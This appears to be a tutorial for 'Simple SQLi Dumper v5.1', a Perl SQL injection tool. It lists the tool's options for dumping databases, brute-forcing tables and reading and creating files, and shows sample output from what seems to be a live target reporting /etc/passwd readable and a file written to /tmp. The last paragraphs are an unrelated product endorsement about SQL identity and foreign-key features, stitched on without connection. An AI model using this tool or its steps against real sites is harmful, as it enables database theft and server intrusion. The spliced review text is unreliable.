aspect_ratio(2) audio_format(3) category(7) customer(200) deposit(11) discount_group(9) discount_group_price(10)

Finding tables: now we use a URL that includes the "c0li" string to find tables and columns.

We can see the database information and the operating system too. Our magic number is 1, and it will be replaced with the "c0li" string.

    Database: 460store
    User:
    Version: 5.0.51a-log
    System: redhat-linux-gnu
    Access to "mysql" Database: No
    Read File "/etc/passwd": Yes (w00t)
    Create File "/tmp/c0li-430.txt": Yes (w00t)
    Done.

    noge]# perl -u -magic
    =
    | Simple SQLi Dumper v5.1 |
    | Coded by Vrs-hCk |
    =
    Help Command: -h, -help, -help
    URL:
    End Tag: -
    Attempting to find the magic number.

A null column is used to execute our SQL query. First of all, we have to find the null column (magic number).

    noge]# perl -h
    Usage: perl
      -u       target with id parameter or sqli url with c0li string
      -e       sql injection end tag (default: "-")
      -d       this option should not be used (default:
      -t       table_name
      -c       column_name (example: id,user,pass,email)
      -s       SPACE code: +,/**/,%20 (default: "+")
      -f       max field to get magic number (default: 123)
      -start   row number to begin dumping data
      -stop    row number to stop dumping
      -where   your special dumping query

      -info    Get MySQL Information
      -dbase   Concat Databases
      -table   Concat Tables
      -column  Concat Columns
      -tabcol  Concat Tables with Columns
      -find    Search Columns Name
      -magic   Find Magic Number
      -dump    Dump Data
      -brute   Fuzzing Tables & Columns

      -log     file name to save ssdp data (default: ssdp.log)
      -p       hostname:port

Features:
- SQL Injection
- Operation System Function
- Dump Database
- Extract Database Schema
- Search Columns Name
- Read File (read only)
- Create File (read only)
- Brute Table & Column

SSDp is a useful penetration tool to find bugs, errors or vulnerabilities in MySQL databases.

USE IT AT YOUR OWN RISK!!
SSDp coded by Vrs-hCk ( anderantisecurityorg )
SSDp How To by NoGe ( marioantisecurityorg )

WE ARE NOT RESPONSIBLE FOR ANY DAMAGE OR IMPROPER USE OF THIS TOOL. USE THIS TOOL FOR EDUCATION PURPOSE ONLY.

It has special features that allow the user to have greater flexibility when working with SQL.

SIMPLE SQLI DUMPER V5.1
by NoGe
Labels: vulnerabilities, linux, tutorial, mixed

I would personally definitely recommend this product. Although it is somewhat costly, it will actually save your organization money in the long term by freeing up extensive labor hours, as well as allowing for better decision making. It will make every process much more efficient and effective. This product is a necessity for anyone working with SQL in large quantities.

This guarantees the Identity field value. Another special feature is the Primary Key Identity feature. For example, the Foreign Keys feature allows the user to set a specific order for the tables in the text file, so that future info can be inserted while avoiding collisions and errors.